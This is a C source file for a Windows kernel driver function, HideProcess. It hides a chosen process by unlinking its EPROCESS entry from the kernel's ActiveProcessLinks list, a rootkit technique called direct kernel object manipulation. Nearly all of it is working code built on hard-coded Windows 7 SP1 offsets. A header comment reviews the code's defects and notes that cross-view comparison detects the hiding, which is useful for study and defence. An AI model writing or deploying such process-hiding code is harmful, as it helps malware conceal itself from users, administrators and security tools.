/*
 * HideProcess - unlink a process from the kernel's ActiveProcessLinks list
 * (direct kernel object manipulation, "DKOM").
 *
 * ulPID: PID of the process to unlink.
 * Returns TRUE when the target EPROCESS was found in the list walk and its
 * list entry was unlinked, FALSE when PsLookupProcessByProcessId failed or
 * the walk returned to the starting EPROCESS without meeting the target.
 *
 * Review notes (defects / caveats visible in this code):
 *  - Every EPROCESS field is addressed by a hard-coded offset that the
 *    comments attribute to Windows 7 SP1 (0x0b8 = ActiveProcessLinks); on any
 *    other build the pointer arithmetic corrupts an unrelated field.
 *  - Pointers are cast through ULONG, which is 32-bit; this is only sound on
 *    a 32-bit kernel.
 *  - PsLookupProcessByProcessId returns a referenced object, and nothing here
 *    releases that reference on either return path.
 *  - The list is walked and modified without any synchronisation against the
 *    kernel's own list updates.
 *  - Because the entry is removed from only one enumeration source, the
 *    process remains visible through other views (handle tables, thread
 *    lists, scheduler state); cross-view comparison is the usual detection.
 */
BOOLEAN HideProcess(ULONG ulPID)
{
    NTSTATUS status;
    PLIST_ENTRY pList_entry;
    PEPROCESS pEproOld,pEproCurrent,pEprProcess;

    // Start the walk at the current process's EPROCESS (also the loop sentinel).
    pEproOld = pEproCurrent = PsGetCurrentProcess();

    // Resolve the target PID to its EPROCESS (adds a reference; never released here).
    status = PsLookupProcessByProcessId((HANDLE)ulPID,&pEprProcess);

    // Lookup failed (e.g. no such PID).
    if (!NT_SUCCESS(status))
    {
        return FALSE;
    }

    // Walk the circular list until we are back at the starting EPROCESS.
    do
    {
        // On Windows 7 SP1 the ImageFileName offset in EPROCESS is 0x16c (per original author).
        //PUCHAR pName = (PUCHAR)((ULONG)pEproCurrent + 0x16c);
        // UniqueProcessId offset is 0x0b4 (per original author).
        //DbgPrint("process name:%s,process id:%d",pName,*(PULONG)((ULONG)pEproCurrent + 0x0b4));

        // Found the target EPROCESS.
        if(pEprProcess == pEproCurrent)
        {
            // On Windows 7 SP1 the ActiveProcessLinks offset in EPROCESS is 0x0b8 (per original author).
            pList_entry = (PLIST_ENTRY)((ULONG)pEproCurrent+0x0b8);

            // Unlink: make the neighbours point past this entry. The entry's own
            // Flink/Blink are left dangling (they still point at the neighbours).
            // Order matters: Blink is read before it is overwritten via the second statement.
            ((PLIST_ENTRY)(pList_entry->Blink))->Flink = pList_entry->Flink;
            ((PLIST_ENTRY)(pList_entry->Flink))->Blink = pList_entry->Blink;

            return TRUE;
        }

        // Advance to the next LIST_ENTRY.
        pList_entry = (PLIST_ENTRY)((ULONG)pEproCurrent+0x0b8);

        // The next LIST_ENTRY sits at offset 0x0b8 inside the next EPROCESS,
        // so subtract the offset to recover that EPROCESS base address.
        pEproCurrent = (PEPROCESS)((ULONG)pList_entry->Flink-0x0b8);

    } while (pEproOld!=pEproCurrent);

    // Target not encountered in a full circuit of the list.
    return FALSE;
}